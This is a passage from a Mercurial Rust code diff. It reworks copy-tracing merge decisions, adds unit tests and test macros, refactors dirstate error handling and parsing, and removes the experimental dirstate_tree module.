&TimeStampedPathCopy, -) -> MergePick { - if src_major.rev == current_merge { - if src_minor.rev == current_merge { - if src_major.path.is_none() { - // We cannot get different copy information for both p1 and p2 - // from the same revision. Unless this was a - // deletion - MergePick::Any - } else { - unreachable!(); - } - } else { - // The last value comes the current merge, this value -will- win - // eventually. 
-            oracle.record_overwrite(src_minor.rev, src_major.rev);
-            MergePick::Major
-        }
+    merge_case_for_dest: impl Fn() -> MergeCase,
+    src_minor: &CopySource,
+    src_major: &CopySource,
+) -> (MergePick, bool) {
+    if src_major == src_minor {
+        (MergePick::Any, false)
+    } else if src_major.rev == current_merge {
+        // minor is different according to the minor == major check earlier
+        debug_assert!(src_minor.rev != current_merge);
+
+        // The last value comes the current merge, this value -will- win
+        // eventually.
+        (MergePick::Major, true)
     } else if src_minor.rev == current_merge {
         // The last value comes the current merge, this value -will- win
         // eventually.
-        oracle.record_overwrite(src_major.rev, src_minor.rev);
-        MergePick::Minor
+        (MergePick::Minor, true)
     } else if src_major.path == src_minor.path {
+        debug_assert!(src_major.rev != src_minor.rev);
         // we have the same value, but from other source;
-        if src_major.rev == src_minor.rev {
-            // If the two entry are identical, they are both valid
-            MergePick::Any
-        } else if oracle.is_overwrite(src_major.rev, src_minor.rev) {
-            MergePick::Minor
+        if src_major.is_overwritten_by(src_minor) {
+            (MergePick::Minor, false)
+        } else if src_minor.is_overwritten_by(src_major) {
+            (MergePick::Major, false)
         } else {
-            MergePick::Major
+            (MergePick::Any, true)
         }
-    } else if src_major.rev == src_minor.rev {
-        // We cannot get copy information for both p1 and p2 in the
-        // same rev. So this is the same value.
-        unreachable!(
-            "conflict information from p1 and p2 in the same revision"
-        );
     } else {
-        let dest_path = path_map.untokenize(*dest);
-        let action = changes.get_merge_case(dest_path);
-        if src_major.path.is_none() && action == MergeCase::Salvaged {
+        debug_assert!(src_major.rev != src_minor.rev);
+        let action = merge_case_for_dest();
+        if src_minor.path.is_some()
+            && src_major.path.is_none()
+            && action == MergeCase::Salvaged
+        {
             // If the file is "deleted" in the major side but was
             // salvaged by the merge, we keep the minor side alive
-            MergePick::Minor
-        } else if src_minor.path.is_none() && action == MergeCase::Salvaged {
+            (MergePick::Minor, true)
+        } else if src_major.path.is_some()
+            && src_minor.path.is_none()
+            && action == MergeCase::Salvaged
+        {
             // If the file is "deleted" in the minor side but was
             // salvaged by the merge, unconditionnaly preserve the
             // major side.
-            MergePick::Major
-        } else if action == MergeCase::Merged {
-            // If the file was actively merged, copy information
-            // from each side might conflict. The major side will
-            // win such conflict.
-            MergePick::Major
-        } else if oracle.is_overwrite(src_major.rev, src_minor.rev) {
-            // If the minor side is strictly newer than the major
-            // side, it should be kept.
-            MergePick::Minor
-        } else if src_major.path.is_some() {
-            // without any special case, the "major" value win
-            // other the "minor" one.
-            MergePick::Major
-        } else if oracle.is_overwrite(src_minor.rev, src_major.rev) {
-            // the "major" rev is a direct ancestors of "minor",
-            // any different value should
-            // overwrite
-            MergePick::Major
+            (MergePick::Major, true)
+        } else if src_minor.is_overwritten_by(src_major) {
+            // The information from the minor version is strictly older than
+            // the major version
+            if action == MergeCase::Merged {
+                // If the file was actively merged, it means some non-copy
+                // activity happened on the other branch. It
+                // means the older copy information is still relevant.
+ // + // The major side wins such conflict. + (MergePick::Major, true) + } else { + // No activity on the minor branch, pick the newer one. + (MergePick::Major, false) + } + } else if src_major.is_overwritten_by(src_minor) { + if action == MergeCase::Merged { + // If the file was actively merged, its means some non-copy + // activity happened on the other branch. It + // mean the older copy information are still relevant. + // + // The major side wins such conflict. + (MergePick::Major, true) + } else { + // No activity on the minor branch, pick the newer one. + (MergePick::Minor, false) + } + } else if src_minor.path.is_none() { + // the minor side has no relevant information, pick the alive one + (MergePick::Major, true) + } else if src_major.path.is_none() { + // the major side has no relevant information, pick the alive one + (MergePick::Minor, true) } else { - // major version is None (so the file was deleted on - // that branch) and that branch is independant (neither - // minor nor major is an ancestors of the other one.) - // We preserve the new - // information about the new file. - MergePick::Minor + // by default the major side wins + (MergePick::Major, true) } } } diff --git a/rust/hg-core/src/copy_tracing/tests.rs b/rust/hg-core/src/copy_tracing/tests.rs new file mode 100644 --- /dev/null +++ b/rust/hg-core/src/copy_tracing/tests.rs @@ -0,0 +1,141 @@ +use super::*; + +/// Unit tests for: +/// +/// ```ignore +/// fn compare_value( +/// current_merge: Revision, +/// merge_case_for_dest: impl Fn() -> MergeCase, +/// src_minor: &CopySource, +/// src_major: &CopySource, +/// ) -> (MergePick, /* overwrite: */ bool) +/// ``` +#[test] +fn test_compare_value() { + // The `compare_value!` macro calls the `compare_value` function with + // arguments given in pseudo-syntax: + // + // * For `merge_case_for_dest` it takes a plain `MergeCase` value instead + // of a closure. 
+ // * `CopySource` values are represented as `(rev, path, overwritten)` + // tuples of type `(Revision, Option<PathToken>, OrdSet<Revision>)`. + // * `PathToken` is an integer not read by `compare_value`. It only checks + // for `Some(_)` indicating a file copy v.s. `None` for a file deletion. + // * `OrdSet<Revision>` is represented as a Python-like set literal. + + use MergeCase::*; + use MergePick::*; + + assert_eq!( + compare_value!(1, Normal, (1, None, { 1 }), (1, None, { 1 })), + (Any, false) + ); +} + +/// Unit tests for: +/// +/// ```ignore +/// fn merge_copies_dict( +/// path_map: &TwoWayPathMap, // Not visible in test cases +/// current_merge: Revision, +/// minor: InternalPathCopies, +/// major: InternalPathCopies, +/// get_merge_case: impl Fn(&HgPath) -> MergeCase + Copy, +/// ) -> InternalPathCopies +/// ``` +#[test] +fn test_merge_copies_dict() { + // The `merge_copies_dict!` macro calls the `merge_copies_dict` function + // with arguments given in pseudo-syntax: + // + // * `TwoWayPathMap` and path tokenization are implicitly taken care of. + // All paths are given as string literals. + // * Key-value maps are represented with `{key1 => value1, key2 => value2}` + // pseudo-syntax. + // * `InternalPathCopies` is a map of copy destination path keys to + // `CopySource` values. + // - `CopySource` is represented as a `(rev, source_path, overwritten)` + // tuple of type `(Revision, Option<Path>, OrdSet<Revision>)`. + // - Unlike in `test_compare_value`, source paths are string literals. + // - `OrdSet<Revision>` is again represented as a Python-like set + // literal. + // * `get_merge_case` is represented as a map of copy destination path to + // `MergeCase`. The default for paths not in the map is + // `MergeCase::Normal`. + // + // `internal_path_copies!` creates an `InternalPathCopies` value with the + // same pseudo-syntax as in `merge_copies_dict!`. 
+ + use MergeCase::*; + + assert_eq!( + merge_copies_dict!( + 1, + {"foo" => (1, None, {})}, + {}, + {"foo" => Merged} + ), + internal_path_copies!("foo" => (1, None, {})) + ); +} + +/// Unit tests for: +/// +/// ```ignore +/// impl CombineChangesetCopies { +/// fn new(children_count: HashMap<Revision, usize>) -> Self +/// +/// // Called repeatedly: +/// fn add_revision_inner<'a>( +/// &mut self, +/// rev: Revision, +/// p1: Revision, +/// p2: Revision, +/// copy_actions: impl Iterator<Item = Action<'a>>, +/// get_merge_case: impl Fn(&HgPath) -> MergeCase + Copy, +/// ) +/// +/// fn finish(mut self, target_rev: Revision) -> PathCopies +/// } +/// ``` +#[test] +fn test_combine_changeset_copies() { + // `combine_changeset_copies!` creates a `CombineChangesetCopies` with + // `new`, then calls `add_revision_inner` repeatedly, then calls `finish` + // for its return value. + // + // All paths given as string literals. + // + // * Key-value maps are represented with `{key1 => value1, key2 => value2}` + // pseudo-syntax. + // * `children_count` is a map of revision numbers to count of children in + // the DAG. It includes all revisions that should be considered by the + // algorithm. + // * Calls to `add_revision_inner` are represented as an array of anonymous + // structs with named fields, one pseudo-struct per call. + // + // `path_copies!` creates a `PathCopies` value, a map of copy destination + // keys to copy source values. Note: the arrows for map literal syntax + // point **backwards** compared to the logical direction of copy! 
+ + use crate::NULL_REVISION as NULL; + use Action::*; + use MergeCase::*; + + assert_eq!( + combine_changeset_copies!( + { 1 => 1, 2 => 1 }, + [ + { rev: 1, p1: NULL, p2: NULL, actions: [], merge_cases: {}, }, + { rev: 2, p1: NULL, p2: NULL, actions: [], merge_cases: {}, }, + { + rev: 3, p1: 1, p2: 2, + actions: [CopiedFromP1("destination.txt", "source.txt")], + merge_cases: {"destination.txt" => Merged}, + }, + ], + 3, + ), + path_copies!("destination.txt" => "source.txt") + ); +} diff --git a/rust/hg-core/src/copy_tracing/tests_support.rs b/rust/hg-core/src/copy_tracing/tests_support.rs new file mode 100644 --- /dev/null +++ b/rust/hg-core/src/copy_tracing/tests_support.rs @@ -0,0 +1,199 @@ +//! Supporting macros for `tests.rs` in the same directory. +//! See comments there for usage. + +/// Python-like set literal +macro_rules! set { + ( + $Type: ty { + $( $value: expr ),* $(,)? + } + ) => {{ + #[allow(unused_mut)] + let mut set = <$Type>::new(); + $( set.insert($value); )* + set + }} +} + +/// `{key => value}` map literal +macro_rules! map { + ( + $Type: ty { + $( $key: expr => $value: expr ),* $(,)? + } + ) => {{ + #[allow(unused_mut)] + let mut set = <$Type>::new(); + $( set.insert($key, $value); )* + set + }} +} + +macro_rules! copy_source { + ($rev: expr, $path: expr, $overwritten: tt) => { + CopySource { + rev: $rev, + path: $path, + overwritten: set!(OrdSet<Revision> $overwritten), + } + }; +} + +macro_rules! compare_value { + ( + $merge_revision: expr, + $merge_case_for_dest: ident, + ($min_rev: expr, $min_path: expr, $min_overwrite: tt), + ($maj_rev: expr, $maj_path: expr, $maj_overwrite: tt) $(,)? + ) => { + compare_value( + $merge_revision, + || $merge_case_for_dest, + ©_source!($min_rev, $min_path, $min_overwrite), + ©_source!($maj_rev, $maj_path, $maj_overwrite), + ) + }; +} + +macro_rules! 
tokenized_path_copies { + ( + $path_map: ident, {$( + $dest: expr => ( + $src_rev: expr, + $src_path: expr, + $src_overwrite: tt + ) + ),*} + $(,)* + ) => { + map!(InternalPathCopies {$( + $path_map.tokenize(HgPath::new($dest)) => + copy_source!( + $src_rev, + Option::map($src_path, |p: &str| { + $path_map.tokenize(HgPath::new(p)) + }), + $src_overwrite + ) + )*}) + } +} + +macro_rules! merge_case_callback { + ( + $( $merge_path: expr => $merge_case: ident ),* + $(,)? + ) => { + #[allow(unused)] + |merge_path| -> MergeCase { + $( + if (merge_path == HgPath::new($merge_path)) { + return $merge_case + } + )* + MergeCase::Normal + } + }; +} + +macro_rules! merge_copies_dict { + ( + $current_merge: expr, + $minor_copies: tt, + $major_copies: tt, + $get_merge_case: tt $(,)? + ) => { + { + #[allow(unused_mut)] + let mut map = TwoWayPathMap::default(); + let minor = tokenized_path_copies!(map, $minor_copies); + let major = tokenized_path_copies!(map, $major_copies); + merge_copies_dict( + &map, $current_merge, minor, major, + merge_case_callback! $get_merge_case, + ) + .into_iter() + .map(|(token, source)| { + ( + map.untokenize(token).to_string(), + ( + source.rev, + source.path.map(|t| map.untokenize(t).to_string()), + source.overwritten.into_iter().collect(), + ), + ) + }) + .collect::<OrdMap<_, _>>() + } + }; +} + +macro_rules! internal_path_copies { + ( + $( + $dest: expr => ( + $src_rev: expr, + $src_path: expr, + $src_overwrite: tt $(,)? + ) + ),* + $(,)* + ) => { + map!(OrdMap<_, _> {$( + String::from($dest) => ( + $src_rev, + $src_path, + set!(OrdSet<Revision> $src_overwrite) + ) + ),*}) + }; +} + +macro_rules! combine_changeset_copies { + ( + $children_count: tt, + [ + $( + { + rev: $rev: expr, + p1: $p1: expr, + p2: $p2: expr, + actions: [ + $( + $Action: ident($( $action_path: expr ),+) + ),* + $(,)? + ], + merge_cases: $merge: tt + $(,)? + } + ),* + $(,)? 
+ ], + $target_rev: expr $(,)* + ) => {{ + let count = map!(HashMap<Revision, usize> $children_count); + let mut combine_changeset_copies = CombineChangesetCopies::new(count); + $( + let actions = vec![$( + $Action($( HgPath::new($action_path) ),*) + ),*]; + combine_changeset_copies.add_revision_inner( + $rev, $p1, $p2, actions.into_iter(), + merge_case_callback! $merge + ); + )* + combine_changeset_copies.finish($target_rev) + }}; +} + +macro_rules! path_copies { + ( + $( $expected_destination: expr => $expected_source: expr ),* $(,)? + ) => { + map!(PathCopies {$( + HgPath::new($expected_destination).to_owned() + => HgPath::new($expected_source).to_owned(), + ),*}) + }; +} diff --git a/rust/hg-core/src/dirstate.rs b/rust/hg-core/src/dirstate.rs --- a/rust/hg-core/src/dirstate.rs +++ b/rust/hg-core/src/dirstate.rs @@ -5,21 +5,23 @@ // This software may be used and distributed according to the terms of the // GNU General Public License version 2 or any later version. -use crate::{utils::hg_path::HgPathBuf, DirstateParseError, FastHashMap}; +use crate::errors::HgError; +use crate::revlog::Node; +use crate::{utils::hg_path::HgPathBuf, FastHashMap}; +use bytes_cast::{unaligned, BytesCast}; use std::collections::hash_map; use std::convert::TryFrom; pub mod dirs_multiset; pub mod dirstate_map; -#[cfg(feature = "dirstate-tree")] -pub mod dirstate_tree; pub mod parsers; pub mod status; -#[derive(Debug, PartialEq, Clone)] +#[derive(Debug, PartialEq, Clone, BytesCast)] +#[repr(C)] pub struct DirstateParents { - pub p1: [u8; 20], - pub p2: [u8; 20], + pub p1: Node, + pub p2: Node, } /// The C implementation uses all signed types. This will be an issue @@ -33,20 +35,24 @@ pub size: i32, } +#[derive(BytesCast)] +#[repr(C)] +struct RawEntry { + state: u8, + mode: unaligned::I32Be, + size: unaligned::I32Be, + mtime: unaligned::I32Be, + length: unaligned::I32Be, +} + /// A `DirstateEntry` with a size of `-2` means that it was merged from the /// other parent. 
This allows revert to pick the right status back during a /// merge. pub const SIZE_FROM_OTHER_PARENT: i32 = -2; -#[cfg(not(feature = "dirstate-tree"))] pub type StateMap = FastHashMap<HgPathBuf, DirstateEntry>; -#[cfg(not(feature = "dirstate-tree"))] pub type StateMapIter<'a> = hash_map::Iter<'a, HgPathBuf, DirstateEntry>; -#[cfg(feature = "dirstate-tree")] -pub type StateMap = dirstate_tree::tree::Tree; -#[cfg(feature = "dirstate-tree")] -pub type StateMapIter<'a> = dirstate_tree::iter::Iter<'a>; pub type CopyMap = FastHashMap<HgPathBuf, HgPathBuf>; pub type CopyMapIter<'a> = hash_map::Iter<'a, HgPathBuf, HgPathBuf>; @@ -60,7 +66,7 @@ } impl TryFrom<u8> for EntryState { - type Error = DirstateParseError; + type Error = HgError; fn try_from(value: u8) -> Result<Self, Self::Error> { match value { @@ -69,8 +75,8 @@ b'r' => Ok(EntryState::Removed), b'm' => Ok(EntryState::Merged), b'?' => Ok(EntryState::Unknown), - _ => Err(DirstateParseError::CorruptedEntry(format!( - "Incorrect entry state {}", + _ => Err(HgError::CorruptedRepository(format!( + "Incorrect dirstate entry state {}", value ))), } diff --git a/rust/hg-core/src/dirstate/dirs_multiset.rs b/rust/hg-core/src/dirstate/dirs_multiset.rs --- a/rust/hg-core/src/dirstate/dirs_multiset.rs +++ b/rust/hg-core/src/dirstate/dirs_multiset.rs @@ -30,7 +30,6 @@ /// Initializes the multiset from a dirstate. /// /// If `skip_state` is provided, skips dirstate entries with equal state. - #[cfg(not(feature = "dirstate-tree"))] pub fn from_dirstate( dirstate: &StateMap, skip_state: Option<EntryState>, @@ -51,30 +50,6 @@ Ok(multiset) } - /// Initializes the multiset from a dirstate. - /// - /// If `skip_state` is provided, skips dirstate entries with equal state. 
- #[cfg(feature = "dirstate-tree")] - pub fn from_dirstate( - dirstate: &StateMap, - skip_state: Option<EntryState>, - ) -> Result<Self, DirstateMapError> { - let mut multiset = DirsMultiset { - inner: FastHashMap::default(), - }; - for (filename, DirstateEntry { state, .. }) in dirstate.iter() { - // This `if` is optimized out of the loop - if let Some(skip) = skip_state { - if skip != state { - multiset.add_path(filename)?; - } - } else { - multiset.add_path(filename)?; - } - } - - Ok(multiset) - } /// Initializes the multiset from a manifest. pub fn from_manifest( diff --git a/rust/hg-core/src/dirstate/dirstate_map.rs b/rust/hg-core/src/dirstate/dirstate_map.rs --- a/rust/hg-core/src/dirstate/dirstate_map.rs +++ b/rust/hg-core/src/dirstate/dirstate_map.rs @@ -5,7 +5,8 @@ // This software may be used and distributed according to the terms of the // GNU General Public License version 2 or any later version. -use crate::revlog::node::NULL_NODE_ID; +use crate::errors::HgError; +use crate::revlog::node::NULL_NODE; use crate::{ dirstate::{parsers::PARENT_SIZE, EntryState, SIZE_FROM_OTHER_PARENT}, pack_dirstate, parse_dirstate, @@ -14,7 +15,7 @@ hg_path::{HgPath, HgPathBuf}, }, CopyMap, DirsMultiset, DirstateEntry, DirstateError, DirstateMapError, - DirstateParents, DirstateParseError, FastHashMap, StateMap, + DirstateParents, FastHashMap, StateMap, }; use micro_timer::timed; use std::collections::HashSet; @@ -72,8 +73,8 @@ self.non_normal_set = None; self.other_parent_set = None; self.set_parents(&DirstateParents { - p1: NULL_NODE_ID, - p2: NULL_NODE_ID, + p1: NULL_NODE, + p2: NULL_NODE, }) } @@ -253,7 +254,6 @@ ) } - #[cfg(not(feature = "dirstate-tree"))] pub fn set_non_normal_other_parent_entries(&mut self, force: bool) { if !force && self.non_normal_set.is_some() @@ -282,34 +282,6 @@ self.non_normal_set = Some(non_normal); self.other_parent_set = Some(other_parent); } - #[cfg(feature = "dirstate-tree")] - pub fn set_non_normal_other_parent_entries(&mut self, force: 
bool) { - if !force - && self.non_normal_set.is_some() - && self.other_parent_set.is_some() - { - return; - } - let mut non_normal = HashSet::new(); - let mut other_parent = HashSet::new(); - - for ( - filename, - DirstateEntry { - state, size, mtime, .. - }, - ) in self.state_map.iter() - { - if state != EntryState::Normal || mtime == MTIME_UNSET { - non_normal.insert(filename.to_owned()); - } - if state == EntryState::Normal && size == SIZE_FROM_OTHER_PARENT { - other_parent.insert(filename.to_owned()); - } - } - self.non_normal_set = Some(non_normal); - self.other_parent_set = Some(other_parent); - } /// Both of these setters and their uses appear to be the simplest way to /// emulate a Python lazy property, but it is ugly and unidiomatic. @@ -366,11 +338,13 @@ }; } else if file_contents.is_empty() { parents = DirstateParents { - p1: NULL_NODE_ID, - p2: NULL_NODE_ID, + p1: NULL_NODE, + p2: NULL_NODE, }; } else { - return Err(DirstateError::Parse(DirstateParseError::Damaged)); + return Err( + HgError::corrupted("Dirstate appears to be damaged").into() + ); } self.parents = Some(parents); @@ -383,10 +357,10 @@ } #[timed] - pub fn read( + pub fn read<'a>( &mut self, - file_contents: &[u8], - ) -> Result<Option<DirstateParents>, DirstateError> { + file_contents: &'a [u8], + ) -> Result<Option<&'a DirstateParents>, DirstateError> { if file_contents.is_empty() { return Ok(None); } @@ -423,7 +397,6 @@ self.set_non_normal_other_parent_entries(true); Ok(packed) } - #[cfg(not(feature = "dirstate-tree"))] pub fn build_file_fold_map(&mut self) -> &FileFoldMap { if let Some(ref file_fold_map) = self.file_fold_map { return file_fold_map; @@ -439,22 +412,6 @@ self.file_fold_map = Some(new_file_fold_map); self.file_fold_map.as_ref().unwrap() } - #[cfg(feature = "dirstate-tree")] - pub fn build_file_fold_map(&mut self) -> &FileFoldMap { - if let Some(ref file_fold_map) = self.file_fold_map { - return file_fold_map; - } - let mut new_file_fold_map = FileFoldMap::default(); - - 
for (filename, DirstateEntry { state, .. }) in self.state_map.iter() { - if state != EntryState::Removed { - new_file_fold_map - .insert(normalize_case(&filename), filename.to_owned()); - } - } - self.file_fold_map = Some(new_file_fold_map); - self.file_fold_map.as_ref().unwrap() - } } #[cfg(test)] diff --git a/rust/hg-core/src/dirstate/dirstate_tree.rs b/rust/hg-core/src/dirstate/dirstate_tree.rs deleted file mode 100644 --- a/rust/hg-core/src/dirstate/dirstate_tree.rs +++ /dev/null @@ -1,14 +0,0 @@ -// dirstate_tree.rs -// -// Copyright 2020, Raphaël Gomès <rgomes@octobus.net> -// -// This software may be used and distributed according to the terms of the -// GNU General Public License version 2 or any later version. - -//! Special-case radix tree that matches a filesystem hierarchy for use in the -//! dirstate. -//! It has not been optimized at all yet. - -pub mod iter; -pub mod node; -pub mod tree; diff --git a/rust/hg-core/src/dirstate/dirstate_tree/iter.rs b/rust/hg-core/src/dirstate/dirstate_tree/iter.rs deleted file mode 100644 --- a/rust/hg-core/src/dirstate/dirstate_tree/iter.rs +++ /dev/null @@ -1,392 +0,0 @@ -// iter.rs -// -// Copyright 2020, Raphaël Gomès <rgomes@octobus.net> -// -// This software may be used and distributed according to the terms of the -// GNU General Public License version 2 or any later version. 
- -use super::node::{Node, NodeKind}; -use super::tree::Tree; -use crate::dirstate::dirstate_tree::node::Directory; -use crate::dirstate::status::Dispatch; -use crate::utils::hg_path::{hg_path_to_path_buf, HgPath, HgPathBuf}; -use crate::DirstateEntry; -use std::borrow::Cow; -use std::collections::VecDeque; -use std::iter::{FromIterator, FusedIterator}; -use std::path::PathBuf; - -impl FromIterator<(HgPathBuf, DirstateEntry)> for Tree { - fn from_iter<T: IntoIterator<Item = (HgPathBuf, DirstateEntry)>>( - iter: T, - ) -> Self { - let mut tree = Self::new(); - for (path, entry) in iter { - tree.insert(path, entry); - } - tree - } -} - -/// Iterator of all entries in the dirstate tree. -/// -/// It has no particular ordering. -pub struct Iter<'a> { - to_visit: VecDeque<(Cow<'a, [u8]>, &'a Node)>, -} - -impl<'a> Iter<'a> { - pub fn new(node: &'a Node) -> Iter<'a> { - let mut to_visit = VecDeque::new(); - to_visit.push_back((Cow::Borrowed(&b""[..]), node)); - Self { to_visit } - } -} - -impl<'a> Iterator for Iter<'a> { - type Item = (HgPathBuf, DirstateEntry); - - fn next(&mut self) -> Option<Self::Item> { - while let Some((base_path, node)) = self.to_visit.pop_front() { - match &node.kind { - NodeKind::Directory(dir) => { - add_children_to_visit( - &mut self.to_visit, - &base_path, - &dir, - ); - if let Some(file) = &dir.was_file { - return Some(( - HgPathBuf::from_bytes(&base_path), - file.entry, - )); - } - } - NodeKind::File(file) => { - if let Some(dir) = &file.was_directory { - add_children_to_visit( - &mut self.to_visit, - &base_path, - &dir, - ); - } - return Some(( - HgPathBuf::from_bytes(&base_path), - file.entry, - )); - } - } - } - None - } -} - -impl<'a> FusedIterator for Iter<'a> {} - -/// Iterator of all entries in the dirstate tree, with a special filesystem -/// handling for the directories containing said entries. -/// -/// It checks every directory on-disk to see if it has become a symlink, to -/// prevent a potential security issue. 
-/// Using this information, it may dispatch `status` information early: it -/// returns canonical paths along with `Shortcut`s, which are either a -/// `DirstateEntry` or a `Dispatch`, if the fate of said path has already been -/// determined. -/// -/// Like `Iter`, it has no particular ordering. -pub struct FsIter<'a> { - root_dir: PathBuf, - to_visit: VecDeque<(Cow<'a, [u8]>, &'a Node)>, - shortcuts: VecDeque<(HgPathBuf, StatusShortcut)>, -} - -impl<'a> FsIter<'a> { - pub fn new(node: &'a Node, root_dir: PathBuf) -> FsIter<'a> { - let mut to_visit = VecDeque::new(); - to_visit.push_back((Cow::Borrowed(&b""[..]), node)); - Self { - root_dir, - to_visit, - shortcuts: Default::default(), - } - } - - /// Mercurial tracks symlinks but *not* what they point to. - /// If a directory is moved and symlinked: - /// - /// ```bash - /// $ mkdir foo - /// $ touch foo/a - /// $ # commit... - /// $ mv foo bar - /// $ ln -s bar foo - /// ``` - /// We need to dispatch the new symlink as `Unknown` and all the - /// descendents of the directory it replace as `Deleted`. - fn dispatch_symlinked_directory( - &mut self, - path: impl AsRef<HgPath>, - node: &Node, - ) { - let path = path.as_ref(); - self.shortcuts.push_back(( - path.to_owned(), - StatusShortcut::Dispatch(Dispatch::Unknown), - )); - for (file, _) in node.iter() { - self.shortcuts.push_back(( - path.join(&file), - StatusShortcut::Dispatch(Dispatch::Deleted), - )); - } - } - - /// Returns `true` if the canonical `path` of a directory corresponds to a - /// symlink on disk. It means it was moved and symlinked after the last - /// dirstate update. - /// - /// # Special cases - /// - /// Returns `false` for the repository root. - /// Returns `false` on io error, error handling is outside of the iterator. 
- fn directory_became_symlink(&mut self, path: &HgPath) -> bool { - if path.is_empty() { - return false; - } - let filename_as_path = match hg_path_to_path_buf(&path) { - Ok(p) => p, - _ => return false, - }; - let meta = self.root_dir.join(filename_as_path).symlink_metadata(); - match meta { - Ok(ref m) if m.file_type().is_symlink() => true, - _ => false, - } - } -} - -/// Returned by `FsIter`, since the `Dispatch` of any given entry may already -/// be determined during the iteration. This is necessary for performance -/// reasons, since hierarchical information is needed to `Dispatch` an entire -/// subtree efficiently. -#[derive(Debug, Copy, Clone)] -pub enum StatusShortcut { - /// A entry in the dirstate for further inspection - Entry(DirstateEntry), - /// The result of the status of the corresponding file - Dispatch(Dispatch), -} - -impl<'a> Iterator for FsIter<'a> { - type Item = (HgPathBuf, StatusShortcut); - - fn next(&mut self) -> Option<Self::Item> { - // If any paths have already been `Dispatch`-ed, return them - if let Some(res) = self.shortcuts.pop_front() { - return Some(res); - } - - while let Some((base_path, node)) = self.to_visit.pop_front() { - match &node.kind { - NodeKind::Directory(dir) => { - let canonical_path = HgPath::new(&base_path); - if self.directory_became_symlink(canonical_path) { - // Potential security issue, don't do a normal - // traversal, force the results. 
- self.dispatch_symlinked_directory( - canonical_path, - &node, - ); - continue; - } - add_children_to_visit( - &mut self.to_visit, - &base_path, - &dir, - ); - if let Some(file) = &dir.was_file { - return Some(( - HgPathBuf::from_bytes(&base_path), - StatusShortcut::Entry(file.entry), - )); - } - } - NodeKind::File(file) => { - if let Some(dir) = &file.was_directory { - add_children_to_visit( - &mut self.to_visit, - &base_path, - &dir, - ); - } - return Some(( - HgPathBuf::from_bytes(&base_path), - StatusShortcut::Entry(file.entry), - )); - } - } - } - - None - } -} - -impl<'a> FusedIterator for FsIter<'a> {} - -fn join_path<'a, 'b>(path: &'a [u8], other: &'b [u8]) -> Cow<'b, [u8]> { - if path.is_empty() { - other.into() - } else { - [path, &b"/"[..], other].concat().into() - } -} - -/// Adds all children of a given directory `dir` to the visit queue `to_visit` -/// prefixed by a `base_path`. -fn add_children_to_visit<'a>( - to_visit: &mut VecDeque<(Cow<'a, [u8]>, &'a Node)>, - base_path: &[u8], - dir: &'a Directory, -) { - to_visit.extend(dir.children.iter().map(|(path, child)| { - let full_path = join_path(&base_path, &path); - (full_path, child) - })); -} - -#[cfg(test)] -mod tests { - use super::*; - use crate::utils::hg_path::HgPath; - use crate::{EntryState, FastHashMap}; - use std::collections::HashSet; - - #[test] - fn test_iteration() { - let mut tree = Tree::new(); - - assert_eq!( - tree.insert( - HgPathBuf::from_bytes(b"foo/bar"), - DirstateEntry { - state: EntryState::Merged, - mode: 41, - mtime: 42, - size: 43, - } - ), - None - ); - - assert_eq!( - tree.insert( - HgPathBuf::from_bytes(b"foo2"), - DirstateEntry { - state: EntryState::Merged, - mode: 40, - mtime: 41, - size: 42, - } - ), - None - ); - - assert_eq!( - tree.insert( - HgPathBuf::from_bytes(b"foo/baz"), - DirstateEntry { - state: EntryState::Normal, - mode: 0, - mtime: 0, - size: 0, - } - ), - None - ); - - assert_eq!( - tree.insert( - HgPathBuf::from_bytes(b"foo/bap/nested"), - 
DirstateEntry { - state: EntryState::Normal, - mode: 0, - mtime: 0, - size: 0, - } - ), - None - ); - - assert_eq!(tree.len(), 4); - - let results: HashSet<_> = - tree.iter().map(|(c, _)| c.to_owned()).collect(); - dbg!(&results); - assert!(results.contains(HgPath::new(b"foo2"))); - assert!(results.contains(HgPath::new(b"foo/bar"))); - assert!(results.contains(HgPath::new(b"foo/baz"))); - assert!(results.contains(HgPath::new(b"foo/bap/nested"))); - - let mut iter = tree.iter(); - assert!(iter.next().is_some()); - assert!(iter.next().is_some()); - assert!(iter.next().is_some()); - assert!(iter.next().is_some()); - assert_eq!(None, iter.next()); - assert_eq!(None, iter.next()); - drop(iter); - - assert_eq!( - tree.insert( - HgPathBuf::from_bytes(b"foo/bap/nested/a"), - DirstateEntry { - state: EntryState::Normal, - mode: 0, - mtime: 0, - size: 0, - } - ), - None - ); - - let results: FastHashMap<_, _> = tree.iter().collect(); - assert!(results.contains_key(HgPath::new(b"foo2"))); - assert!(results.contains_key(HgPath::new(b"foo/bar"))); - assert!(results.contains_key(HgPath::new(b"foo/baz"))); - // Is a dir but `was_file`, so it's listed as a removed file - assert!(results.contains_key(HgPath::new(b"foo/bap/nested"))); - assert!(results.contains_key(HgPath::new(b"foo/bap/nested/a"))); - - // insert removed file (now directory) after nested file - assert_eq!( - tree.insert( - HgPathBuf::from_bytes(b"a/a"), - DirstateEntry { - state: EntryState::Normal, - mode: 0, - mtime: 0, - size: 0, - } - ), - None - ); - - // `insert` returns `None` for a directory - assert_eq!( - tree.insert( - HgPathBuf::from_bytes(b"a"), - DirstateEntry { - state: EntryState::Removed, - mode: 0, - mtime: 0, - size: 0, - } - ), - None - ); - - let results: FastHashMap<_, _> = tree.iter().collect(); - assert!(results.contains_key(HgPath::new(b"a"))); - assert!(results.contains_key(HgPath::new(b"a/a"))); - } -} diff --git a/rust/hg-core/src/dirstate/dirstate_tree/node.rs 
b/rust/hg-core/src/dirstate/dirstate_tree/node.rs deleted file mode 100644 --- a/rust/hg-core/src/dirstate/dirstate_tree/node.rs +++ /dev/null @@ -1,398 +0,0 @@ -// node.rs -// -// Copyright 2020, Raphaël Gomès <rgomes@octobus.net> -// -// This software may be used and distributed according to the terms of the -// GNU General Public License version 2 or any later version. - -use super::iter::Iter; -use crate::utils::hg_path::HgPathBuf; -use crate::{DirstateEntry, EntryState, FastHashMap}; - -/// Represents a filesystem directory in the dirstate tree -#[derive(Debug, Default, Clone, PartialEq)] -pub struct Directory { - /// Contains the old file information if it existed between changesets. - /// Happens if a file `foo` is marked as removed, removed from the - /// filesystem then a directory `foo` is created and at least one of its - /// descendents is added to Mercurial. - pub(super) was_file: Option<Box<File>>, - pub(super) children: FastHashMap<Vec<u8>, Node>, -} - -/// Represents a filesystem file (or symlink) in the dirstate tree -#[derive(Debug, Clone, PartialEq)] -pub struct File { - /// Contains the old structure if it existed between changesets. - /// Happens all descendents of `foo` marked as removed and removed from - /// the filesystem, then a file `foo` is created and added to Mercurial. - pub(super) was_directory: Option<Box<Directory>>, - pub(super) entry: DirstateEntry, -} - -#[derive(Debug, Clone, PartialEq)] -pub enum NodeKind { 